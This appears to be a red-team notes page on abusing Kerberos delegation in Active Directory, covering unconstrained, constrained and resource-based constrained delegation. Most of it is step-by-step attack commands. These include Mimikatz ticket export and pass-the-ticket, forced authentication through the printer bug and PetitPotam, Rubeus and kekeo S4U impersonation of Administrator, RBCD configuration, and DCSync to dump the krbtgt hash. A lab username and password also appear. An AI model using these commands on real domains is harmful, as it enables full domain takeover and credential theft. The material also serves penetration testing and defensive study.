Trustee and Resource Delegation

Threats & Research Archives - F-Secure BlogF-Secure Blog

https://www.guidepointsecurity.com/blog/delegating-like-a-boss-abusing-kerberos-delegation-in-active-directory/www.guidepointsecurity.com

ADeleginator

GitHub - techspence/ADeleginator: A companion tool that uses ADeleg to find insecure trustee and resource delegations in Active DirectoryGitHub

NXC

nxc ldap 192.168.56.11 -u eddard.stark -p FightP3aceAndHonor! --find-delegation

https://x.com/al3x_n3ff/status/1857153795949559875?t=3iN0A-aTMN58zD0O7rIIlA&s=03

SharpADWS

GitHub - wh0amitz/SharpADWS: Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS).GitHub

Unconstrained Delegation

Unconstrained Delegation: allows the first hop server to request access to any service on any computer in the domain

Getting Domain Admin with Kerberos Unconstrained Delegation

Active Directory Security Risk #101: Kerberos Unconstrained Delegation (or How Compromise of a Single Server Can Compromise the Domain)Active Directory Security

Discovery

• PowerView

Get-DomainComputer -UnConstrained

• AD Module

Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}

Compromise the server where unconstrained delegation is enabled

Wait for a DA to connect then

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Reuse DA token

Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\[****]-*****-Administrator@krbtgt-DOMAIN.LOCAL.kirbi"'

Trick a high user to connect to a machine with Unconstrained Delegation ? Printer Bug

MisconfigurationPrint Spooler

MS-RPRN abuse (PrinterBug)The Hacker Recipes

Printerbug also works across a Two-way forest trust with TGT Delegation enabled - See Trusts

Capture the TGT of dc$ by using Rubeus on victim server

Rubeus.exe monitor /interval:5 /nowrap

Printerbug - Run MS-RPRN.exe

GitHub - leechristensen/SpoolSample: PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well.GitHub

PrecompiledBinaries/SpoolSample.exe at master · jtmpu/PrecompiledBinariesGitHub

MS-RPRN.exe \\dc.domain.local \\vicitm.domain.local

# Victim host
Rubeus.exe monitor /interval:5 /nowrap

Or with PetitPotam

GitHub - topotam/PetitPotam: PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.GitHub

.\PetitPotam.exe victim-hostname

# Victim host
Rubeus.exe monitor /interval:5 /nowrap

On Linux, use Coercer

SMB (445, 139) / RPC

ShadowCoerce or DFSCoerce can also be used

GitHub - ShutdownRepo/ShadowCoerce: MS-FSRVP coercion abuse PoCGitHub

GitHub - Wh04m1001/DFSCoerceGitHub

Copy the base64 encoded TGT and remove extra spaces before use it

Rubeus.exe ptt /ticket:<Base64>

Or use Invoke-Mimikatz:

[IO.File]::WriteAllBytes("C:\AD\Tools\USDC.kirbi",
[Convert]::FromBase64String("ticket_from_Rubeus_monitor"))
Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\ticket.kirbi"'

Run DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

DCSync

Constrained Delegation - Protocol Transition

Constrained Delegation: allows the first hop server to request access only to specified computers

Service for User (S4U) used to impersonate a user

S4U2self: allows a forwardable TGS to itself on behalf of a user - TUSTED_TO_AUTHENTICATE_FOR_DELEGATION

S4U2proxy: allows a service to obtain a TGS to a second service on behalf of the user - msDS-AllowedToDelegateTo contains a list of SPN to which the token can be forwarded

Discovery

• PowerView

Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

• AD Module

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Abusing with kekeo

password or NTLM/AES keys required

1. Request a TGT

kekeo# tgt::ask /user:victim_user /domain:domain.local /rc4:<ntlm_hash>

1. Request a TGS

kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL

kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL|HTTP/mssql.domain.LOCAL

1. Inject the ticket

Invoke-Mimikatz -Command '"kerberos:ptt <tgs_from_step_2>.kirbi"'

ls \\mssql.domain.local\c$

Invoke-Command -ScriptBlock{whoami} -ComputerName mssql.domain.local

Abusing with Rubeus

Request TGT and TGS in a single command

Rubeus.exe s4u /user:victim_user /aes256:<aes_key> /impersonateuser:Administrator /msdsspn:CIFS/mssql.domain.LOCAL /ptt

ls \\mssql.domain.local\c$

The delegation occurs not only for the specified service but for any service running under the same account. No validation for the SPN specified

With rc4

Rubeus.exe s4u /user:appsvc /rc4:<ntlm_hash> /impersonateuser:administrator /msdsspn:CIFS/mssql.domain.local /altservice:HTTP /domain:domain.local /ptt

winrs -r:umssql-hostname cmd.exe

Abusing with kekeo

password or NTLM/AES keys required

1. Request a TGT

kekeo# tgt::ask /user:victim_machine_account$ /domain:domain.local /rc4:<ntlm_hash>

1. Request a TGS

kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:time/dc.domain.LOCAL|ldap/dc.domain.LOCAL

1. Inject the ticket

Invoke-Mimikatz -Command '"kerberos:ptt <tgs_from_step_2>.kirbi"'

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

Abusing with Rubeus

Request TGT and TGS in a single command

Rubeus.exe s4u /user:victim_machine_account$ /aes256:<aes_key> /impersonateuser:Administrator /msdsspn:time/dc.domain.LOCAL /altservice:ldap /ptt

SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"

Persistence - msDS-AllowedToDelegateTo

Persistence

Resource-based Constrained Delegation

Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active DirectoryShenanigans Labs

(RBCD) Resource-based constrainedThe Hacker Recipes

Instead of SPNs on msDS-AllowedToDelegatTo on the front end service, access is control by a security descriptor of msDS-AllowedToActOnBehalfOfOtherIdentity (visible as PrincipalsAllowedToDelegateToAccount) on the resource/service

The service administrator can configure this delegation whereas for other type SeEnableDelagation privs required - by default only DA

Two privileges needed to abuse RBCD:

1. Write permissions over the target service

2. Control over an object which as SPN configured (like admin access do a domain joined machine or ability to join a machine to domain - ms-DS- MachineAccountQuota is 10 by default)

Write Permission

Find-InterestingDomainACL | ?{$_.identityreferencename -match 'username'}

Exploit

Configure RBCD

$comps = 'computer1$','computer2$'
Set-ADComputer -Identity victim -PrincipalsAllowedToDelegateToAccount $comps

Extract AES keys for computerx$

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

Use the AES key and access vicitm as ANY user we want

Rubeus.exe s4u /user:computer1$ /aes256:<aes_key> /msdsspn:http/victim /impersonateuser:administrator /ptt

winrs -r:victim cmd.exe

Constrained Delegation - Kerberos Only

Leverage RBCD to abuse Kerberos Only configuration

Enumeration

# AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -PropertiesmsDS-AllowedToDelegateTo

Create a new machine account

https://github.com/Kevin-Robertson/Powermad

Powermad.ps1 New-MachineAccount -MachineAccount studentcompX

Configure RBCD

# On victim host
Rubeus.exe asktgt /user:victim$ /aes256:<aes_key> /impersonateuser:administrator /domain:domain.local /ptt /nowrap

# With AD Module
Set-ADComputer -Identity victim$ -PrincipalsAllowedToDelegateToAccount studentcompX$ -Verbose

Get TGS

# Get hash
Rubeus.exe hash/password:P@ssword@123

Rubeus.exe s4u /impersonateuser:administrator /user:studentcompX$ /rc4:<rc4_hash> /msdsspn:cifs/victim.domain.local /nowrap

Request a new forwardable TGS

Rubeus.exe s4u /tgs:<base67_tgs_from_previous_step> /user:victim$ /aes256:<victim$_aes> /msdsspn:cifs/mssql.domain.local /altservice:http /nowrap /ptt

winrs -r:mssql.domain.local cmd.exe